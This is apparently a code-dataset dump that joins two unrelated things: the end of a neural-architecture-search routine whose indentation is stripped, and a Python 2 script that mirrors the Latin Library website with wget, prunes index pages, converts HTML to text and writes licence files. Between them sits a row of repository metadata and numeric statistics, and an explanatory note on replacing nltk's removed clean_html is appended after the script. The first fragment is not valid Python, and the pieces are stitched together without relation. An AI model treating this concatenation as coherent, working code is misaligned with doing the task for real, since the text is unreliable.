allow_isomorphisms=allow_isomorphisms,
mutation_rate=mutation_rate
)
if encode_paths:
xcandidates = np.array([c[3] for c in candidates])
else:
xcandidates = np.array([c[7] for c in candidates])
predictions = []
train_error = 0
for _ in range(num_ensemble):
if gpu is not None:
meta_neuralnet = MetaNeuralnet(gpu=gpu)
else:
meta_neuralnet = MetaNeuralnet()
train_error += meta_neuralnet.fit(xtrain, ytrain, **metann_params)
predictions.append(np.squeeze(meta_neuralnet.predict(xcandidates)))
K.clear_session()
tf.reset_default_graph()
del meta_neuralnet
train_error /= num_ensemble
if verbose:
logger.info('Query {}, Meta neural net train error: {}'.format(query, train_error))
samples = None
if record_kt == 'T':
sorted_indices, samples = acq_fn(predictions, explore_type, get_samples=True)
candidates_gt = [can[4] for can in candidates]
kt = get_kendalltau_coorlection(samples.tolist(), candidates_gt)[0]
kt_list.append(kt)
else:
sorted_indices = acq_fn(predictions, explore_type)
kt_top_pred_list = []
kt_top_gt_list = []
for i in sorted_indices[:k]:
archtuple = candidates[i]
data.append(archtuple)
if samples is not None:
kt_top_pred_list.append(samples[i])
kt_top_gt_list.append(archtuple[4])
if samples is not None:
kt_top_list.append(get_kendalltau_coorlection(kt_top_pred_list, kt_top_gt_list)[0])
if verbose:
top_5_loss = sorted([d[4] for d in data])[:min(5, len(data))]
logger.info('Query {}, top 5 val losses {}'.format(query, top_5_loss))
query += k
return data, {'type': type, 'final_data': data, 'kt_list': kt_list, 'kt_top_list': kt_top_list,
'mutate_list': mutate_list} | 46.338333 | 111 | 0.486998 | 2,686 | 27,803 | 4.760983 | 0.055845 | 0.036988 | 0.011261 | 0.01564 | 0.979903 | 0.978808 | 0.978808 | 0.978808 | 0.9731 | 0.96356 | 0 | 0.012479 | 0.437974 | 27,803 | 600 | 112 | 46.338333 | 0.8059 | 0.008956 | 0 | 0.943363 | 0 | 0 | 0.031588 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012389 | false | 0 | 0.012389 | 0 | 0.037168 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f4fc88e4f3d0b16e831172a04ade5899447707d1 | 10,475 | py | Python | latin_library_crawler.py | JamesWolfe753/Latin-Library-Latin-Texts | ed99cb586ce056bf828cf5924ae1e8c103e3493e | [
"RSA-MD"
] | 4 | 2015-10-16T11:58:58.000Z | 2019-04-06T19:53:02.000Z | latin_library_crawler.py | JamesWolfe753/Latin-Library-Latin-Texts | ed99cb586ce056bf828cf5924ae1e8c103e3493e | [
"RSA-MD"
] | 5 | 2016-05-17T17:01:25.000Z | 2018-07-19T15:14:40.000Z | latin_library_crawler.py | JamesWolfe753/Latin-Library-Latin-Texts | ed99cb586ce056bf828cf5924ae1e8c103e3493e | [
"RSA-MD"
] | 10 | 2016-05-17T15:31:53.000Z | 2019-03-30T22:15:02.000Z | import os
from nltk.util import clean_html
print "Downloading files ..."
#these files w/o last-modified header info
#so add -c to not dl if remote same size
os.system("wget -r -c -l0 -t1 -N -np -A.html,shtml -erobots=off http://www.thelatinlibrary.com/indices.html")
print "Removing indices and other non-Latin files ..."
os.system("rm -r www.thelatinlibrary.com/101/ www.thelatinlibrary.com/imperialism/ www.thelatinlibrary.com/ll2/ www.thelatinlibrary.com/law/ www.thelatinlibrary.com/romhist/ www.thelatinlibrary.com/satire/ www.thelatinlibrary.com/sallust/ www.thelatinlibrary.com/historians/ www.thelatinlibrary.com/certamen/ www.thelatinlibrary.com/caligula/ www.thelatinlibrary.com/caes/ www.thelatinlibrary.com/apul/ www.thelatinlibrary.com/august.html www.thelatinlibrary.com/ammianus.html www.thelatinlibrary.com/alanus.html www.thelatinlibrary.com/apicius.html www.thelatinlibrary.com/albertanus.html www.thelatinlibrary.com/albertofaix.html www.thelatinlibrary.com/alcuin.html www.thelatinlibrary.com/avienus.html www.thelatinlibrary.com/appverg.html www.thelatinlibrary.com/arnobius.html www.thelatinlibrary.com/apuleius.html www.thelatinlibrary.com/aquinas.html www.thelatinlibrary.com/alice.html www.thelatinlibrary.com/ausonius.html www.thelatinlibrary.com/abelard.html www.thelatinlibrary.com/about.html www.thelatinlibrary.com/anselm.html www.thelatinlibrary.com/addison.html www.thelatinlibrary.com/aug.html www.thelatinlibrary.com/ambrose.html www.thelatinlibrary.com/egeria.html www.thelatinlibrary.com/hyginus.html www.thelatinlibrary.com/iordanes.html www.thelatinlibrary.com/epubs.html www.thelatinlibrary.com/erasmus.html www.thelatinlibrary.com/decl.html www.thelatinlibrary.com/des.html www.thelatinlibrary.com/eutropius.html www.thelatinlibrary.com/florus.html www.thelatinlibrary.com/forsett.html www.thelatinlibrary.com/frame1.html www.thelatinlibrary.com/frame2.html www.thelatinlibrary.com/frontinus.html www.thelatinlibrary.com/commodianus.html www.thelatinlibrary.com/curtius.html www.thelatinlibrary.com/dante.html www.thelatinlibrary.com/contemp.html www.thelatinlibrary.com/cred.html www.thelatinlibrary.com/fulgentius.html www.thelatinlibrary.com/gaius.html www.thelatinlibrary.com/gellius.html www.thelatinlibrary.com/gestafrancorum.html www.thelatinlibrary.com/celtis.html 
www.thelatinlibrary.com/corvinus.html www.thelatinlibrary.com/godfrey.html www.thelatinlibrary.com/bultelius.html www.thelatinlibrary.com/claudian.html www.thelatinlibrary.com/cassiodorus.html www.thelatinlibrary.com/bible.html www.thelatinlibrary.com/caes.html www.thelatinlibrary.com/columba.html www.thelatinlibrary.com/campion.html www.thelatinlibrary.com/capellanus.html www.thelatinlibrary.com/columella.html www.thelatinlibrary.com/cato.html www.thelatinlibrary.com/certamen.html www.thelatinlibrary.com/christian.html www.thelatinlibrary.com/cic.html www.thelatinlibrary.com/classics.html www.thelatinlibrary.com/boethiusdacia.html www.thelatinlibrary.com/bede.html www.thelatinlibrary.com/bennett.html www.thelatinlibrary.com/bernardcluny.html www.thelatinlibrary.com/balde.html www.thelatinlibrary.com/bacon.html www.thelatinlibrary.com/manilius.html www.thelatinlibrary.com/miscmed.html www.thelatinlibrary.com/nemesianus.html www.thelatinlibrary.com/martial.html www.thelatinlibrary.com/malaterra.html www.thelatinlibrary.com/neo.html www.thelatinlibrary.com/nepos.html www.thelatinlibrary.com/marcellinus.html www.thelatinlibrary.com/liberpontificalis.html www.thelatinlibrary.com/may.html www.thelatinlibrary.com/medieval.html www.thelatinlibrary.com/melancthon.html www.thelatinlibrary.com/mirandola.html www.thelatinlibrary.com/misc.html www.thelatinlibrary.com/modinst.html www.thelatinlibrary.com/newton.html www.thelatinlibrary.com/leo.html www.thelatinlibrary.com/nithardus.html www.thelatinlibrary.com/lhomond.html www.thelatinlibrary.com/notitia.html www.thelatinlibrary.com/luther.html www.thelatinlibrary.com/phaedrus.html www.thelatinlibrary.com/lactantius.html www.thelatinlibrary.com/martinofbraga.html www.thelatinlibrary.com/leges.html www.thelatinlibrary.com/mapps.html www.thelatinlibrary.com/lucan.html www.thelatinlibrary.com/lucretius.html www.thelatinlibrary.com/orosius.html www.thelatinlibrary.com/ovid.html www.thelatinlibrary.com/ottofreising.html 
www.thelatinlibrary.com/papal.html www.thelatinlibrary.com/pascoli.html www.thelatinlibrary.com/patricius.html www.thelatinlibrary.com/pauldeacon.html www.thelatinlibrary.com/landor.html www.thelatinlibrary.com/leothegreat.html www.thelatinlibrary.com/liv.html www.thelatinlibrary.com/justin.html www.thelatinlibrary.com/justinian.html www.thelatinlibrary.com/juvenal.html www.thelatinlibrary.com/jerome.html www.thelatinlibrary.com/janus.html www.thelatinlibrary.com/sedulius.html www.thelatinlibrary.com/sall.html www.thelatinlibrary.com/ter.html www.thelatinlibrary.com/solinus.html www.thelatinlibrary.com/ritchie.html www.thelatinlibrary.com/sabinus.html www.thelatinlibrary.com/sidonius.html www.thelatinlibrary.com/sannazaro.html www.thelatinlibrary.com/sigebert.html www.thelatinlibrary.com/williamtyre.html www.thelatinlibrary.com/sen.html www.thelatinlibrary.com/tertullian.html www.thelatinlibrary.com/seneca.html www.thelatinlibrary.com/sha.html www.thelatinlibrary.com/vallauri.html www.thelatinlibrary.com/silius.html www.thelatinlibrary.com/waltarius.html www.thelatinlibrary.com/spinoza.html www.thelatinlibrary.com/statius.html www.thelatinlibrary.com/suet.html www.thelatinlibrary.com/sulpiciusseverus.html www.thelatinlibrary.com/tac.html www.thelatinlibrary.com/theodosius.html www.thelatinlibrary.com/tib.html www.thelatinlibrary.com/valeriusflaccus.html www.thelatinlibrary.com/vitruvius.html www.thelatinlibrary.com/readme2005.html www.thelatinlibrary.com/readme2007.html www.thelatinlibrary.com/richerus.html www.thelatinlibrary.com/readme2006.html www.thelatinlibrary.com/readme1999.html www.thelatinlibrary.com/readme.html www.thelatinlibrary.com/readme2000.html www.thelatinlibrary.com/readme1998.html www.thelatinlibrary.com/readme2001.html www.thelatinlibrary.com/readme2002.html www.thelatinlibrary.com/readme2003.html www.thelatinlibrary.com/readme2004.html www.thelatinlibrary.com/quintilian.html www.thelatinlibrary.com/livius/ 
www.thelatinlibrary.com/livy/liv.per.shtml www.thelatinlibrary.com/plautus.html www.thelatinlibrary.com/pliny.html www.thelatinlibrary.com/pliny1.html www.thelatinlibrary.com/augustine/serm.shtml www.thelatinlibrary.com/cicero/adbrutum.shtml www.thelatinlibrary.com/cicero/cat.shtml www.thelatinlibrary.com/cicero/fam.shtml www.thelatinlibrary.com/cicero/fin.shtml www.thelatinlibrary.com/cicero/inventione.shtml www.thelatinlibrary.com/cicero/fratrem.shtml www.thelatinlibrary.com/cicero/leg.shtml www.thelatinlibrary.com/cicero/legagr.shtml www.thelatinlibrary.com/cicero/oratore.shtml www.thelatinlibrary.com/cicero/phil.shtml www.thelatinlibrary.com/cicero/off.shtml www.thelatinlibrary.com/cicero/repub.shtml www.thelatinlibrary.com/cicero/tusc.shtml www.thelatinlibrary.com/cicero/ver.shtml www.thelatinlibrary.com/cicero/nd.shtml www.thelatinlibrary.com/cicero/epis.shtml www.thelatinlibrary.com/virgil/index.html www.thelatinlibrary.com/varro.html www.thelatinlibrary.com/valmax.html www.thelatinlibrary.com/prop.html www.thelatinlibrary.com/Voc.html www.thelatinlibrary.com/Vocab.html www.thelatinlibrary.com/Vocab2.html www.thelatinlibrary.com/tertullian/tertullian.cultu.shtml www.thelatinlibrary.com/tertullian/tertullian.marcionem.shtml www.thelatinlibrary.com/tertullian/tertullian.nationes.shtml www.thelatinlibrary.com/tertullian/tertullian.uxor.shtml www.thelatinlibrary.com/prud.html www.thelatinlibrary.com/pomponius.html www.thelatinlibrary.com/sedulius.html www.thelatinlibrary.com/vegetius.html www.thelatinlibrary.com/vell.html www.thelatinlibrary.com/verg.html www.thelatinlibrary.com/addison.html www.thelatinlibrary.com/albertanus.html")
print "Stripping HTML and changing extensions to .txt ..."
for r, d, f in os.walk("www.thelatinlibrary.com"):
    for files in f:
        if files.endswith("html"):
            path = os.path.join(r, files)
            opened = open(path, 'r')
            readed = opened.read()
            opened.close()
            new_opened = open(path, "w")
            new_opened.write(clean_html(readed))
            new_opened.close()
            fileName, fileExtension = os.path.splitext(path)
            os.rename(fileName + fileExtension, fileName + ".txt")
print "Creating Public Domain LICENSE ..."
os.system("touch www.thelatinlibrary.com/LICENSE.md")
os.system("printf 'Public Domain Mark 1.0\n----------------------\n### No Copyright\nThis work has been identified as being free of known restrictions under copyright law, including all related and neighboring rights.\n\nYou can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission. See Other Information below.\n\n### Other Information\n- The work may not be free of known copyright restrictions in all jurisdictions.\n- Persons may have other rights in or related to the work, such as patent or trademark rights, and others may have rights in how the work is used, such as publicity or privacy rights.\n- In some jurisdictions moral rights of the author may persist beyond the term of copyright. These rights may include the right to be identified as the author and the right to object to derogatory treatments.\n- Unless expressly stated otherwise, the person who identified the work makes no warranties about the work, and disclaims liability for all uses of the work, to the fullest extent permitted by applicable law.\n- When using or citing the work, you should not imply endorsement by the author or the person who identified the work.\n\nA copy of this Mark is available at: <https://creativecommons.org/publicdomain/mark/1.0/>.' >> www.thelatinlibrary.com/LICENSE.md")
print "Creating README.md ..."
os.system("touch www.thelatinlibrary.com/README.md")
os.system('printf "About the Latin Library\n=======================\n\nThe Latin Library is a collection of a wide variety of texts from the archaic period to the modern era. Altogether the corpus is about 108 MB.\n\nThese files are in the public domain, [as explained here](http://thelatinlibrary.com/about.html). For a declaration of their status in public domain, see LICENSE.md." >> www.thelatinlibrary.com/README.md')
print "Renaming corpus to thelatinlibrary ..."
os.system("mv www.thelatinlibrary.com thelatinlibrary")
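Note that the script's HTML-stripping step depends on `nltk.util.clean_html`, which was removed in NLTK 3.x (calling it now raises `NotImplementedError` and points users to BeautifulSoup). A stdlib-only sketch of the same text-extraction step, assuming Python 3 and no external dependencies:

```python
from html.parser import HTMLParser


class TextExtractor(HTMLParser):
    """Collect only the character data of an HTML document, dropping all tags."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def handle_data(self, data):
        self.parts.append(data)

    def text(self):
        return "".join(self.parts)


def strip_html(markup):
    """Return the plain text of an HTML fragment (illustrative replacement
    for the removed nltk.util.clean_html)."""
    parser = TextExtractor()
    parser.feed(markup)
    parser.close()
    return parser.text()
```

For example, `strip_html("<p>Arma <b>virumque</b> cano</p>")` yields `"Arma virumque cano"`. For production use, `BeautifulSoup(html).get_text()` is more robust against malformed markup.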